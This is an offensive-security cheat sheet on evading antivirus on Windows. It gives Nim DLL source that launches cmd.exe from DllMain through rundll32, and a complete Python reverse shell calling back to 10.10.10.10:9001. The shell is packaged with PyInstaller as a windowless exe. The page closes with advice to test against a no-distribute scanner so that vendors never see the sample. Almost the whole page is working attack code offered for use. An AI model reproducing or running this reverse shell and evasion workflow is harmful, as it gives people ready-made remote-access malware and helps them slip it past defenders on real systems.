AV Evasion

Using a Nim DLL

Crafting

Open cmd and cd to the Nim toolchain directory (e.g. C:\Users\Administrator\.nimble\bin), or make sure nim is on PATH. Then create the following file:

import osproc
import winim

# Runtime initialiser emitted by the Nim compiler. Because the DLL is built
# with --nomain, nothing calls it automatically, so DllMain has to.
proc NimMain() {.cdecl, importc.}

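# DLL entry point, exported under its C name so the loader (and rundll32)
# can find it. --nomain stops Nim from emitting its own DllMain.
proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
  # DllMain is also invoked for thread attach/detach and process detach.
  # The Nim runtime must be initialised exactly once, so only do it on
  # process attach rather than on every call.
  if fdwReason == DLL_PROCESS_ATTACH:
    NimMain()
    # DllMain runs under the loader lock. execProcess() would block here
    # until cmd.exe exits (it waits for the child and collects its output),
    # stalling the process that loaded us; startProcess() returns as soon as
    # the child exists. poParentStreams avoids creating pipes nobody drains.
    # The Process handle is deliberately not kept: this is a PoC and closing
    # it would not terminate the child anyway.
    discard startProcess("cmd.exe", options = {poUsePath, poParentStreams})

  return true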

Save the code as file.nim.

Compile (from the directory containing file.nim; `-d=mingw` selects the MinGW cross-compiler and is only needed when building on a non-Windows host)

nim c -d=mingw --app=lib --nomain --cpu=amd64 .\file.nim

Execution (rundll32 loads the DLL, so DllMain runs at load time regardless of which exported name you pass after the comma; the named export is then called again with rundll32's own argument convention)

rundll32.exe file.dll,DllMain

Reference: https://github.com/byt3bl33d3r/OffensiveNim

Using PyInstaller

Payload (a plaintext reverse shell: connects back to 10.10.10.10:9001 and bridges the socket to a cmd.exe child — change the address and port to your listener)

import os,socket,subprocess,threading;
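def s2p(s, p):
    """Pump bytes from the socket into the shell's stdin.

    Runs until the peer closes the connection (``recv`` returns ``b""``)
    or the socket errors out. The shell's stdin is then closed so ``cmd``
    sees EOF and exits, which releases the ``p.wait()`` in the main thread.

    Args:
        s: connected socket (anything exposing ``recv``).
        p: process whose ``stdin`` is a writable binary stream.
    """
    while True:
        try:
            data = s.recv(1024)
        except OSError:
            break
        if not data:
            # Peer hung up. The original loop kept spinning on empty reads
            # forever instead of tearing the shell down.
            break
        p.stdin.write(data)
        p.stdin.flush()  # pipes are block-buffered; push each command now
    try:
        p.stdin.close()
    except OSError:
        pass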

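def p2s(s, p):
    """Pump the shell's output back to the socket.

    Reads whatever is currently available on ``p.stdout`` (up to 4 KiB per
    call instead of one byte per ``send``) and forwards it with ``sendall``
    so partial sends are not silently dropped. Returns when stdout hits EOF
    (the shell has exited) or the socket errors out.

    Args:
        s: connected socket (anything exposing ``sendall``).
        p: process whose ``stdout`` is a readable binary stream with ``read1``.
    """
    while True:
        chunk = p.stdout.read1(4096)
        if not chunk:
            # EOF: the shell is gone. The original looped forever sending b"".
            break
        try:
            s.sendall(chunk)
        except OSError:
            break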

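# Listener the shell calls back to; change these to your own host/port.
HOST = "10.10.10.10"
PORT = 9001


def main(host=HOST, port=PORT):
    """Connect back to the listener and bridge the socket to a cmd child.

    Two daemon threads shuttle bytes in each direction; the main thread
    blocks until the shell exits. The socket is closed on every exit path
    (not only Ctrl-C) and a still-running shell is terminated, so neither
    the connection nor the child outlives the payload.

    Args:
        host: listener address.
        port: listener TCP port.
    """
    # create_connection() resolves the host for IPv4/IPv6; the with-block
    # closes the socket however we leave.
    with socket.create_connection((host, port)) as s:
        p = subprocess.Popen(
            ["cmd"],
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            stdin=subprocess.PIPE,
            # The exe is built with --noconsole; without this flag a console
            # child would allocate its own visible window on Windows.
            creationflags=getattr(subprocess, "CREATE_NO_WINDOW", 0),
        )
        try:
            for pump in (s2p, p2s):
                threading.Thread(target=pump, args=[s, p], daemon=True).start()
            p.wait()
        except KeyboardInterrupt:
            pass
        finally:
            if p.poll() is None:
                p.terminate()


if __name__ == "__main__":
    main()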

Compiling

cd C:\Users\Administrator\AppData\Local\Programs\Python\Python311\Scripts
pip install pyinstaller

pyinstaller.exe --noconsole --onefile  C:\Users\Administrator\Desktop\runit3.py
  • The resulting .exe is written to the dist folder.

Checking the file against AV engines — use a no-distribute scanner such as the one below rather than VirusTotal, which shares submitted samples with vendors and will burn the payload.

https://antiscan.me/
